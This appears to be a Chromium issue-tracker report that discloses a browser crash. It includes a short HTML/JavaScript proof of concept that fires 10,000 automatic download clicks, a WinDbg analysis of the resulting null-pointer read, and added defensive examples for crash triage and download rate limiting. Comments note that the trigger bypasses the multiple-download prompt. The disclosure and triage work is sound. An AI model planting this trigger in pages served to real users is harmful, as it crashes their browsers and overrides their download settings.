Security: SHELL32!CProperTreeHost::_ConnectToView NULL Pointer Read
Reported by dillon.b...@gmail.com, Oct 9 2017
Issue description
VULNERABILITY DETAILS
With the script included in this report, it is possible to crash Chrome version 61.0.3163.100 on Windows 10 10.0.14393, and more than likely other Chrome versions prior to the one listed in this report (haven't tested other Chrome builds).
On Ubuntu 17.0.4 64-bit it locks up the environment and Chrome hangs (sometimes crashes, but never recovers). By invoking the download dialog window multiple times, Chrome eats up system resources, stores temporary files (would-be downloads) on the disk, and the user is never able to make a clean exit from the browser; it ultimately crashes with the following exception.
Also, I sent some of my other crashes this evening via chrome://crashes
(2164.ff0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
SHELL32!CProperTreeHost::_ConnectToView+0x1af:
00007ffb`3bb850ab 488b01 mov rax,qword ptr [rcx]
VERSION
Chrome Version: 61.0.3163.100 (Official Build) (64-bit) (cohort: Stable)
Operating System: Windows 10 Home 10.0.14393
Ubuntu 17.04 64-bit 61.0.3163.100 (Official Build) (64-bit)
REPRODUCTION CASE
The following trigger will reproduce the issue. I've tested on Windows 10 and Debian Linux.
<html>
<p id="demo"></p>
<script>
var a = document.createElement('a');
a.download = 'download';
a.href = "file.zip";
var text = "";
var buff = "";
var i;
for (i = 0; i < 10000; i++) {
buff += " " * i;
text += buff;
text += "<br>";
a.click();
}
document.getElementById("demo").innerHTML = text;
</script>
</html>
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: browser
Crash State: [see link above: stack trace, registers, exception record]
(2164.ff0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
SHELL32!CProperTreeHost::_ConnectToView+0x1af:
00007ffb`3bb850ab 488b01 mov rax,qword ptr [rcx] ds:00000000`00000000=????????????????
0:596> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Users\tester\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\amd64\FileSyncShell64.dll -
GetUrlPageData2 (WinHttp) failed: 12002.
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
FAULTING_IP:
SHELL32!CProperTreeHost::_ConnectToView+1af
00007ffb`3bb850ab 488b01 mov rax,qword ptr [rcx]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffb3bb850ab (SHELL32!CProperTreeHost::_ConnectToView+0x00000000000001af)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 0000000000000000
Attempt to read from address 0000000000000000
FAULTING_THREAD: 0000285c
DEFAULT_BUCKET_ID: NULL_POINTER_READ
PROCESS_NAME: chrome.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000000
EXCEPTION_PARAMETER2: 0000000000000000
FOLLOWUP_IP:
SHELL32!CProperTreeHost::_ConnectToView+1af
00007ffb`3bb850ab 488b01 mov rax,qword ptr [rcx]
READ_ADDRESS: 0000000000000000
WATSON_BKT_PROCSTAMP: 59c30ceb
WATSON_BKT_PROCVER: 61.0.3163.100
PROCESS_VER_PRODUCT: Google Chrome
WATSON_BKT_MODULE: SHELL32.dll
WATSON_BKT_MODSTAMP: 59b0d382
WATSON_BKT_MODOFFSET: 350ab
WATSON_BKT_MODVER: 10.0.14393.1715
MODULE_VER_PRODUCT: Microsoft® Windows® Operating System
BUILD_VERSION_STRING: 10.0.14393.1198 (rs1_release_sec.170427-1353)
MODLIST_WITH_TSCHKSUM_HASH: 7da7f6933478707b75a328e21bd929704193f903
MODLIST_SHA1_HASH: 3ccf75c7f42b8607e3aa044ad00823313e63f708
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 784
DUMP_TYPE: fe
ANALYSIS_SESSION_HOST: DESKTOP-CAAPA7D
ANALYSIS_SESSION_TIME: 10-09-2017 15:05:23.0565
ANALYSIS_VERSION: 10.0.15063.468 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE: ENU
PROBLEM_CLASSES:
ID: [0n292]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0xff0]
Frame: [0] : SHELL32!CProperTreeHost::_ConnectToView
ID: [0n264]
Type: [INVALID_POINTER_READ]
Class: Primary
Scope: BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0xff0]
Frame: [0] : SHELL32!CProperTreeHost::_ConnectToView
ID: [0n279]
Type: [NULL_POINTER_READ]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [0x2164]
TID: [0xff0]
Frame: [0] : SHELL32!CProperTreeHost::_ConnectToView
BUGCHECK_STR: APPLICATION_FAULT_NULL_POINTER_READ_INVALID_POINTER_READ
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
LAST_CONTROL_TRANSFER: from 00007ffb3bb84bb8 to 00007ffb3bb850ab
STACK_TEXT:
000000c7`db3eb670 00007ffb`3bb84bb8 : 00000281`de0b0ac8 00007ffb`3aa83289 00000281`de0b0ac8 00000281`de0b0a48 : SHELL32!CProperTreeHost::_ConnectToView+0x1af
000000c7`db3eb6e0 00007ffb`3bb87847 : 00000000`00000000 00000281`d7fca610 00000281`d7fca708 00000281`d7fca6d8 : SHELL32!CProperTreeHost::SetSite+0x48
000000c7`db3eb720 00007ffb`3aa85169 : 00000000`80004005 00000281`b564d1e8 00000000`80004005 00000281`bacc25f0 : SHELL32!CProperTreeModuleInner::SetSite+0xc7
000000c7`db3eb790 00007ffb`3bb887ba : 00000281`903bb6d0 00000281`9033adb0 00000281`d7fca6d8 00007ffb`3bb8a660 : shcore!IUnknown_SetSite+0x49
000000c7`db3eb7d0 00007ffb`3bb88574 : 00000281`00000000 00007ffb`3bb88eb0 00000281`b564d1e8 00007ffb`3bb8a660 : SHELL32!DUI_WalkIUnknownElements+0x41a
000000c7`db3eb880 00007ffb`3bb88574 : 00000281`00000001 00007ffb`3bb88eb0 00000281`b564d1e8 00007ffb`3bb8a660 : SHELL32!DUI_WalkIUnknownElements+0x1d4
000000c7`db3eb930 00007ffb`3bb88574 : 00000281`00000000 00007ffb`3bb88eb0 00000281`b564d1e8 00000281`b564d1e0 : SHELL32!DUI_WalkIUnknownElements+0x1d4
000000c7`db3eb9e0 00007ffb`3bc14f00 : 00000281`00000001 00007ffb`3bb88eb0 00000281`b564d1e8 00007ffb`00000005 : SHELL32!DUI_WalkIUnknownElements+0x1d4
000000c7`db3eba90 00007ffb`3bc15b6d : 00000281`b564d1e0 00007ffb`3bbd2b20 00000281`b564d1d0 00000000`00000000 : SHELL32!CDUIViewFrame::SetShellView+0x110
000000c7`db3ebb50 00007ffb`3bc8630d : 00000000`00013dc8 00007ffb`3a4c7523 00000281`ddc87308 0000000c`00000000 : SHELL32!CDUIViewFrame::SetLayoutDefinition+0x56d
000000c7`db3ebca0 00007ffb`3ac56569 : 00000281`c2f0d000 00000281`c2f0d000 00000281`da9fa130 00000000`0000032b : SHELL32!CExplorerBrowser::RefreshViewFrame+0x5d
000000c7`db3ebce0 00007ffb`3ac55a24 : 00000281`ddc87308 00000281`c2f0d000 00000281`c2f0d000 00000281`e3b0e510 : COMDLG32!CFileOpenSave::_PokeViewFrame+0x39
000000c7`db3ebd10 00007ffb`3ac4819d : 000000c7`db3ec9b0 00000000`00000000 00000000`00000000 00000000`00000001 : COMDLG32!CFileOpenSave::_InitOpenSaveDialog+0x19a4
000000c7`db3ec8b0 00007ffb`3d1e5177 : 00000000`00000001 000000c7`db3ed208 00000000`00000000 00000000`00000001 : COMDLG32!CFileOpenSave::s_OpenSaveDlgProc+0x19d
000000c7`db3ed0b0 00007ffb`3d1e4766 : 00000000`00000000 00007ffb`3ac48000 00000000`00000110 00007ffb`3d597e73 : USER32!UserCallDlgProcCheckWow+0x173
000000c7`db3ed190 00007ffb`3d1e4686 : 00000281`c2f0d000 00000000`00000110 00000000`00000000 ffffffff`eb0a4c09 : USER32!DefDlgProcWorker+0xc6
000000c7`db3ed250 00007ffb`3d1e1c24 : 00000000`00000001 00000000`00000000 00000000`00000000 00000000`00040002 : USER32!DefDlgProcW+0x36
000000c7`db3ed290 00007ffb`3d1e125e : 00000281`85b169f0 00007ffb`3d615e50 00000000`00153d94 00007ffb`3d615e50 : USER32!UserCallWinProcCheckWow+0x274
000000c7`db3ed3f0 00007ffb`3d1ea221 : 00000000`00000000 00007ffb`3ac48000 00000000`00122c1e 00000281`85b169f0 : USER32!SendMessageWorker+0x20e
000000c7`db3ed480 00007ffb`3d1fe209 : 00000000`000b12fe 00000000`00000000 00000000`000b12fe 00000000`00000001 : USER32!InternalCreateDialog+0x971
000000c7`db3ed630 00007ffb`3d1fe0c2 : 00000281`bb54a4f0 00000000`000b12fe 00007ffb`3ac48000 00007ffb`3ac40000 : USER32!InternalDialogBox+0x125
000000c7`db3ed690 00007ffb`3d1fe058 : 00000000`00000000 000000c7`db3ed810 00000281`c2f0d000 00000000`00000000 : USER32!DialogBoxIndirectParamAorW+0x52
000000c7`db3ed6d0 00007ffb`3ac534e5 : 00000000`00000000 00000281`b4fa6240 000000c7`db3ed810 00000281`c2f0d000 : USER32!DialogBoxIndirectParamW+0x18
000000c7`db3ed710 00007ffb`3aca73f0 : 00000000`00000000 00000281`c2f0d008 00000000`00000000 000000c7`db3eef00 : COMDLG32!CFileOpenSave::Show+0x615
000000c7`db3eda40 00007ffb`3aca5ef4 : 00000000`00000000 000000c7`00000001 000000c7`db3edb20 00000281`e7b39fe0 : COMDLG32!_InvokeNewFileOpenSave+0xf0
000000c7`db3edaa0 00007ffb`3ac9f4c6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000281`c2f0d008 : COMDLG32!_CreateNewFileOpenSaveInProc+0xe8
000000c7`db3edaf0 00007ffb`3ac837c7 : 00000000`00000000 000000c7`db3edbd0 00000000`00000001 00000281`93f9ada8 : COMDLG32!NewGetFileName+0x15e
000000c7`db3edb50 00007ffb`3ac8407f : 00000000`00000000 000000c7`db3eef00 000000c7`db3eed70 000000c7`db3eef00 : COMDLG32!GetFileName+0xff
000000c7`db3edbb0 00007ffa`f8e82d0b : 000000c7`db3eed70 00000281`00000000 00000000`00000000 000000c7`db3eef00 : COMDLG32!GetSaveFileNameW+0x5f
000000c7`db3eec70 00007ffa`f86c41b3 : 00000000`00000000 00000000`00000000 00000281`93f9ad48 00000281`980b8cc0 : chrome!ChromeSelectFileDialogFactory::BlockingGetSaveFileName+0x5b
000000c7`db3eee20 00007ffa`f86c3b83 : 00000281`93f9ad20 00000281`93f9ad20 00000281`abd444c0 00007ffa`f9f207b0 : chrome!`anonymous namespace'::SelectFileDialogImpl::SaveFileAsWithFilter+0x1d3
000000c7`db3ff030 00007ffa`f7cb1bc2 : 000000c7`db3ff328 00000002`903fb754 00000281`93f9acf0 00000000`00000000 : chrome!`anonymous namespace'::SelectFileDialogImpl::ExecuteSelectFile+0xdb
000000c7`db3ff260 00007ffa`f7c54266 : 00007ffa`f9babd38 00007ffb`3d5b683e 000031b4`01b8c5e1 00007ffb`3d5e8067 : chrome!base::debug::TaskAnnotator::RunTask+0x1a2
000000c7`db3ff410 00007ffa`f7c54dc3 : 00000281`a64c68d0 00000281`a615bff0 00000000`00000010 00000281`855f0cc0 : chrome!base::MessageLoop::RunTask+0x1f6
000000c7`db3ff570 00007ffa`f7cb2141 : 00000281`00000155 00000000`00000000 00007ffa`f86c3944 00007ffa`f9babd38 : chrome!base::MessageLoop::DoWork+0x553
000000c7`db3ff770 00007ffa`f7cb1dc4 : 00000281`a615bff0 00000281`a64c68d0 000000c7`db3ff850 00007ffa`f7c5c52b : chrome!base::MessagePumpForUI::DoRunLoop+0x71
000000c7`db3ff7e0 00007ffa`f7c84719 : 000000c7`db3ff910 00000002`903fb408 00000281`a9d06750 00000281`a9d06750 : chrome!base::MessagePumpWin::Run+0x54
000000c7`db3ff830 00007ffa`f7c4fe04 : 00000000`00000ff0 00000281`a615bff0 00000000`00000000 00000281`a615bff0 : chrome!base::RunLoop::Run+0x69
000000c7`db3ff8e0 00007ffa`f7c32800 : 00000000`00000ff0 00000000`00000ff0 00000281`a7ed5560 00000000`0000595c : chrome!base::Thread::ThreadMain+0x1d4
000000c7`db3ff9b0 00007ffb`3d458364 : 00000000`0000595c 00000000`0000595c 00000000`00000000 00000000`00000000 : chrome!base::`anonymous namespace'::ThreadFunc+0xf0
000000c7`db3ffa10 00007ffb`3d5d7091 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
000000c7`db3ffa40 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
THREAD_SHA1_HASH_MOD_FUNC: 1125158608539c1c09333bbbae9f0d38a7e14506
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: d5cc908385b836fc35c94e458a13ed0814faf10a
THREAD_SHA1_HASH_MOD: fd3a967f77ad9d4e1e8d6879381fd9d754a6d8b7
FAULT_INSTR_CODE: 48018b48
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: SHELL32!CProperTreeHost::_ConnectToView+1af
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: SHELL32
IMAGE_NAME: SHELL32.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 59b0d382
STACK_COMMAND: ~596s ; kb
FAILURE_BUCKET_ID: NULL_POINTER_READ_c0000005_SHELL32.dll!CProperTreeHost::_ConnectToView
BUCKET_ID: APPLICATION_FAULT_NULL_POINTER_READ_INVALID_POINTER_READ_SHELL32!CProperTreeHost::_ConnectToView+1af
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: SHELL32.dll
BUCKET_ID_IMAGE_STR: SHELL32.dll
FAILURE_MODULE_NAME: SHELL32
BUCKET_ID_MODULE_STR: SHELL32
FAILURE_FUNCTION_NAME: CProperTreeHost::_ConnectToView
BUCKET_ID_FUNCTION_STR: CProperTreeHost::_ConnectToView
BUCKET_ID_OFFSET: 1af
BUCKET_ID_MODTIMEDATESTAMP: 59b0d382
BUCKET_ID_MODCHECKSUM: 153f536
BUCKET_ID_MODVER_STR: 10.0.14393.1715
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_NULL_POINTER_READ_INVALID_POINTER_READ_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: SHELL32.dll!CProperTreeHost::_ConnectToView
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/chrome.exe/61.0.3163.100/59c30ceb/SHELL32.dll/10.0.14393.1715/59b0d382/c0000005/000350ab.htm?Retriage=1
TARGET_TIME: 2017-10-09T06:06:09.000Z
OSBUILD: 14393
OSSERVICEPACK: 1198
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS Personal
USER_LCID: 0
OSBUILD_TIMESTAMP: 2017-04-28 08:48:56
BUILDDATESTAMP_STR: 170427-1353
BUILDLAB_STR: rs1_release_sec
BUILDOSVER_STR: 10.0.14393.1198
ANALYSIS_SESSION_ELAPSED_TIME: 10750
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:null_pointer_read_c0000005_shell32.dll!cpropertreehost::_connecttoview
FAILURE_ID_HASH: {564ca407-b74d-b740-9f68-6eb189e57da6}
Followup: MachineOwner
---------
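The WinDbg `!analyze -v` output above is the artifact a triager works from when deciding whether a crash like this is a plain denial of service or something worse. The following is an added example, not code from the report or from Chromium: a small helper that parses that output (the sample below is a trimmed, constructed copy of the lines quoted in the report), extracts the exception code, the access kind and faulting address from the exception parameters, the failure bucket and the symbolic stack frames, and applies the usual first-pass rule that a read from the never-mapped null page is a crash rather than a memory-corruption primitive. The rule set is a starting point for review, not a verdict.

```javascript
// Added example, not part of the bug report: first-pass triage of a WinDbg
// `!analyze -v` session. Field names are the ones WinDbg prints.

// Constructed sample: a trimmed copy of the analysis text from this report.
const SAMPLE_ANALYSIS = `
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffb3bb850ab (SHELL32!CProperTreeHost::_ConnectToView+0x00000000000001af)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 0000000000000000
Attempt to read from address 0000000000000000
READ_ADDRESS: 0000000000000000
STACK_TEXT:
000000c7\`db3eb670 00007ffb\`3bb84bb8 : 00000281\`de0b0ac8 00007ffb\`3aa83289 00000281\`de0b0ac8 00000281\`de0b0a48 : SHELL32!CProperTreeHost::_ConnectToView+0x1af
000000c7\`db3eb6e0 00007ffb\`3bb87847 : 00000000\`00000000 00000281\`d7fca610 00000281\`d7fca708 00000281\`d7fca6d8 : SHELL32!CProperTreeHost::SetSite+0x48
000000c7\`db3edbb0 00007ffa\`f8e82d0b : 000000c7\`db3eed70 00000281\`00000000 00000000\`00000000 000000c7\`db3eef00 : COMDLG32!GetSaveFileNameW+0x5f
000000c7\`db3eec70 00007ffa\`f86c41b3 : 00000000\`00000000 00000000\`00000000 00000281\`93f9ad48 00000281\`980b8cc0 : chrome!ChromeSelectFileDialogFactory::BlockingGetSaveFileName+0x5b
FAILURE_BUCKET_ID: NULL_POINTER_READ_c0000005_SHELL32.dll!CProperTreeHost::_ConnectToView
`;

const STATUS_ACCESS_VIOLATION = 0xc0000005;
// EXCEPTION_RECORD.ExceptionInformation[0] for an access violation:
// 0 = read, 1 = write, 8 = execute (DEP). WinDbg prints it as Parameter[0].
const ACCESS_KIND = { 0: 'read', 1: 'write', 8: 'execute' };
// User-mode Windows never maps the lowest 64 KiB, so a fault there is a null-ish pointer.
const NULL_PAGE_LIMIT = 0x10000n;

// Value of a "NAME: value" line, or null if the field is absent.
function field(text, name) {
  const m = text.match(new RegExp(`^${name}:\\s*([^\\n]*)`, 'm'));
  return m ? m[1].trim() : null;
}

// Symbolic frames (module!function+offset) listed under STACK_TEXT, top frame first.
function stackFrames(text) {
  const start = text.indexOf('STACK_TEXT:');
  if (start < 0) return [];
  const frames = [];
  for (const line of text.slice(start).split('\n').slice(1)) {
    if (!/^[0-9a-f]{8}`[0-9a-f]{8} /.test(line)) break; // end of the frame table
    frames.push(line.split(' : ').pop().trim());
  }
  return frames;
}

function parseAnalysis(text) {
  const codeField = field(text, 'ExceptionCode');
  const p0 = field(text, 'Parameter\\[0\\]');
  const p1 = field(text, 'Parameter\\[1\\]');
  return {
    exceptionCode: codeField ? parseInt(codeField.split(/\s+/)[0], 16) : null,
    accessKind: p0 === null ? null : (ACCESS_KIND[parseInt(p0, 16)] || 'unknown'),
    faultAddress: p1 === null ? null : BigInt('0x' + p1),
    bucket: field(text, 'FAILURE_BUCKET_ID'),
    frames: stackFrames(text),
  };
}

// First frame belonging to the given module, e.g. the point where the crashing
// call left the application's own code for a system DLL.
function firstFrameInModule(frames, module) {
  return frames.find((f) => f.startsWith(module + '!')) || null;
}

// Heuristic classification: execute and write faults need a closer look,
// a read from the null page is the classic unexploitable NULL dereference.
function triage(rec) {
  if (rec.exceptionCode !== STATUS_ACCESS_VIOLATION) return 'not-an-access-violation';
  if (rec.accessKind === 'execute') return 'review: execute fault';
  if (rec.accessKind === 'write') return 'review: write fault';
  if (rec.accessKind === 'read' && rec.faultAddress !== null && rec.faultAddress < NULL_PAGE_LIMIT) {
    return 'likely-dos: null-page read';
  }
  return 'review: read fault at non-null address';
}

const sampleRecord = parseAnalysis(SAMPLE_ANALYSIS);
console.log(sampleRecord.bucket, '->', triage(sampleRecord));
console.log('entry from application code:', firstFrameInModule(sampleRecord.frames, 'chrome'));
```

The `firstFrameInModule` lookup is what tells you that although the fault is inside SHELL32, the path into it is Chrome's own save-file dialog code, which is where a fix or rate limit would have to live.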
Comment, Oct 9 2017
Using code to automatically click the <A> seems to be a simple way to circumvent the "Ask when a site tries to download files automatically after the first file (recommended)" setting from chrome://settings/content/automaticDownloads. When you open the POC, it appears to attempt to invoke a file download 10000 times in parallel which inevitably fails in spectacular fashion. The |text| and |buff| manipulation in the POC doesn't seem to be necessary to cause a crash.
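The comment above describes the failure mode: each of the 10000 synthetic clicks opens its own save dialog instead of being held behind a single "download multiple files?" decision. The following is an added example, not Chrome's code and not a description of how Chrome implements the setting: a simplified model of how a per-page automatic download gate should behave so that a burst of programmatic clicks produces one dispatched download and one prompt, with everything else dropped until the user answers. The state names and the gesture rule are assumptions made for the illustration.

```javascript
// Added example, not Chromium code: a simplified per-page automatic download
// gate. Assumed policy: the first download is allowed, the next automatic one
// raises a single prompt, and while that prompt is outstanding further
// automatic requests are dropped rather than opening more dialogs.

class DownloadGate {
  constructor() {
    this.state = 'fresh'; // fresh -> seen -> prompting -> trusted | blocked
    this.counts = { allow: 0, prompt: 0, drop: 0 };
  }

  // Decide what to do with one download request. A request backed by a real
  // user gesture is honoured in any state, because it was not automatic.
  attempt({ userGesture = false } = {}) {
    let decision;
    if (userGesture || this.state === 'fresh' || this.state === 'trusted') {
      decision = 'allow';
      if (this.state === 'fresh') this.state = 'seen';
    } else if (this.state === 'seen') {
      decision = 'prompt'; // ask the user once ...
      this.state = 'prompting';
    } else {
      decision = 'drop'; // ... and drop everything until they answer (or forever if blocked)
    }
    this.counts[decision]++;
    return decision;
  }

  // The user's answer to the outstanding prompt.
  resolvePrompt(allowed) {
    if (this.state !== 'prompting') throw new Error('no prompt outstanding');
    this.state = allowed ? 'trusted' : 'blocked';
  }
}

// Replay a burst of n automatic requests, the shape of load the report's loop produces.
function simulateBurst(n) {
  const gate = new DownloadGate();
  for (let i = 0; i < n; i++) gate.attempt();
  return { ...gate.counts, state: gate.state };
}

console.log(simulateBurst(10000)); // { allow: 1, prompt: 1, drop: 9998, state: 'prompting' }
```

The point of the model is the `drop` branch: the user is asked once, and the 9998 requests that arrive while the question is open never reach the dialog code, so nothing in the burst scales with the attacker's loop count.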
Comment, Oct 9 2017
Thanks for the report. Removing security labels since this is a DoS. Please see https://chromium.googlesource.com/chromium/src/+/master/docs/security/faq.md#are-denial-of-service-issues-considered-security-bugs
Comment, Oct 9 2017
Thank you both for the information and quick feedback. Noted on faq DoS.
Comment, Oct 12 2017
Comment, Oct 13 2017
Circumvention of the multiple download prompt is similar to Issue 446084.
Comment, Oct 13 2017
Comment 1 by dillon.b...@gmail.com, Oct 9 2017
Attachment: 53.7 KB